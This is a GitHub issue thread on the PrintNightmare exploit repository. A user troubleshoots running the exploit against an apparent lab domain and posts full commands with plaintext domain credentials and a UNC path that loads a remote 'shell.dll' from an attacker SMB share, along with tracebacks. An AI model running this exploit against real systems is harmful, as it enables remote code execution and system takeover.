search

cube0x0 / CVE-2021-1675

C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
1.83k stars 581 forks source link

RPRN SessionError: code: 0xa1 - ERROR_BAD_PATHNAME - The specified path is invalid. #58

Closed W4RCL0UD closed 3 years ago

W4RCL0UD commented 3 years ago

I've tried multiple different options, I keep seeing this error:

./CVE-2021-1675.py marvel.local/pparker:Password2@10.128.40.54 '\\\\10.128.40.50\\smb\\shell.dll' [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\UNIDRV.DLL [*] Executing \??\UNC\\??\UNC\10.128.40.50\??\UNC\smb\??\UNC\shell.dll [*] Try 1... Traceback (most recent call last): File "/home/warcloud/data/./CVE-2021-1675.py", line 177, in <module> main(dce, pDriverPath, options.share) File "/home/warcloud/data/./CVE-2021-1675.py", line 82, in main resp = par.hRpcAsyncAddPrinterDriver(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/par.py", line 543, in hRpcAsyncAddPrinterDriver return dce.request(request, MSRPC_UUID_WINSPOOL) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request raise exception impacket.dcerpc.v5.par.DCERPCSessionError: RPRN SessionError: code: 0xa1 - ERROR_BAD_PATHNAME - The specified path is invalid.

./CVE-2021-1675.py marvel.local/pparker:Password2@10.128.40.54 '\\10.128.40.50\smb\shell.dll' 1 ⨯ [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\UNIDRV.DLL [*] Executing \??\UNC\10.128.40.50\smb\shell.dll [*] Try 1... Traceback (most recent call last): File "/home/warcloud/data/./CVE-2021-1675.py", line 177, in <module> main(dce, pDriverPath, options.share) File "/home/warcloud/data/./CVE-2021-1675.py", line 82, in main resp = par.hRpcAsyncAddPrinterDriver(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/par.py", line 543, in hRpcAsyncAddPrinterDriver return dce.request(request, MSRPC_UUID_WINSPOOL) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request raise exception impacket.dcerpc.v5.par.DCERPCSessionError: RPRN SessionError: unknown error code: 0x180

W4RCL0UD commented 3 years ago

image

W4RCL0UD commented 3 years ago

It looks like it finally executed with the last syntax here, but still doesn't appear to be executing the payload:

image

Is there a way to manually verify on the Windows box that the malicious .DLL file was copied over?

W4RCL0UD commented 3 years ago

Issue resolved - only successful on Domain Controllers